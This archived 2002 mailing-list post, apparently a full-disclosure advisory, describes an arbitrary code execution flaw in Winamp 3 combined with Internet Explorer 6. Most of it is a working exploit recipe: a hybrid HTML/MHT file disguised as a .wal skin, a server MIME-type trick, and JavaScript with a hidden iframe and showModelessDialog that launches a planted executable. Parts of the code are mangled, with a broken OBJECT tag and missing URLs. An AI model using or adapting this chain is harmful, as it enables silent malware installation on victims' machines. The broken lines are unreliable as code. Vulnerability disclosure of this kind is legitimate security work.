From: "Jelmer" <[EMAIL PROTECTED]>
Sent: Sunday, August 11, 2002 1:28 AM
Subject: newly released winamp 3 fails to address serious "execution of
arbitrary" code issue when combined with MSIE6

> For those of you who have been living under a rock winamp 3 final was
> released today
> It features freeform skins, now plays video's, allows you to manage your
> mp3's and a lot more
> Unfortunatly they failed to adress a pretty serious arbitrary code
> vulnerability when combined with
> Internet explorer that I reporteded to them and this list earlier
> winamp 2. I haven't heard from them since
> Winamp 3 uses a new skinning system that uses the .wal extention, this
> type is also
> opened automaticly in MSIE, it doesn't prompt for download and stores the
> file in a known location on the users harddisk namely
> C:\Program Files\Winamp3\Skins
> (when installed in the default location like most people do)
> Working Exploit code is available at
> Note that this version DOES NOT use any unpatched MSIE hole to invoke the
> executable and it will continue to work even after microsoft patches its
> browser
> As i understand it this is just the way the object tag behaves in the
> zone. (wich seems very very dangerous to me)
> I also updated the winamp2 exploit code at
> Ok to encourrage winamp/aol to take their customers security a bit more
> serious here's "the recipe" to how its
> done.
> It's kind of "http-equivesq" in length and obscurity and may not be for
> faint of heart.
> Its written from the top of my head, so please forgive me if i missed a
> brace or dot here and there, here goes.
> create a directory c:\exploit
> place an exe file in it, lets call it payload.exe
> then create a file called exploit.htm and give it the following contents
> <html>
> <body>
> <img src="payload.exe">
> </body>
> </html>
> open the file in internet explorer, choose file > save as, and save it as
> exploit.mht
> open it in notepad and add the following line to the top <html
> style="display:none;">
> so it looks like this :
> <html style="display:none;">
> From: <Saved by Microsoft Internet Explorer 5>
> Subject:
> Date: Mon, 5 Aug 2002 18:30:03 +0200
> MIME-Version: 1.0
> Then look for the body section of this html document (it looks a little
> mangled)
> delete everything between the body tags and place an object tag in its
> place, so it looks like this
> <META content=3D"MSHTML 6.00.2716.2200" name=3DGENERATOR></HEAD>
> <BODY>
> <OBJECT NAME="X" CLASSID="CLSID:11111111-1111-1111-1111-111111111111"
> exploit/payload.exe"></OBJECT>
> </BODY></HTML>
> this is the code that will later be used to invoke our executable
> What we have done is we have slightly altered the mht file so that it can
> vieuwed both as html and as mht file.
> files starting with an <html> tag are always seen as html files in
> explorer. (wich can be a pain as will be descibed as followed)
> ok we are set to go, now we want to place this on the users harddisk.
> We know wal files are opened automaticly by winamp3 and placed in a known
> location so we'll rename our exploit.mht file to wal
> unfortunatly internet explorer disrespects mime types so by having added a
> <html> tag to the mht file it tries top open it as an <html> file
> the only way i found around this is to set the mime type to a value MSIE
> doesn't know. I chose x-foo/x-bar
> If you are using apache you can add the following to your mime.types file
> x-foo/x-bar                     wal
> this means that the webserver will pass this mime type along with every
> requested ending in .wal
> when we now request this file it will be opened by winamp3 and an
> errormessage will follow shortly,
> however at that time it is allready too late, our exploit.wal file has
> placed in
> C:\Program Files\Winamp3\Skins\exploit.wal
> now all that remains is  bringing it together by making the following
> sequence of events occur
> 1. download our exploit.wal
> 2. wait a few seconds for it to finish downloading then call exploit.wal
> html file  (the file also doubles as mht file and the object tag included
> the html portion points to itself as the codebase)
> here's the code for this
> <html>
> <body>
> Waiting for 5 seconds..
> <!-- download our renamed mht file and place it on the users disk -->
> <iframe src="amp.wal" style="display:none"></iframe>
> <script language="javascript">
> //wait for 5 seconds
> setTimeout("ExecuteFile()",5000);
> function ExecuteFile() {
>  // open the saved wal file as html file
>  // oddly when called from disk it didn't open it as html file so we need
> force this behaviour by using a modeless dialog
>  sHTML = 'file:///C:/Program%20Files/Winamp3/Skins/amp.wal';
>     sFeatures = 'dialogLeft: 0px; dialogTop: 0px; dialogWidth: 0px;
> dialogheight: 0px; status:no; unadorned:yes; help:no';
>     vReturnValue = window.showModelessDialog(sHTML, '', sFeatures)
> }
> </script>
> </body>
> </html>
> have fun
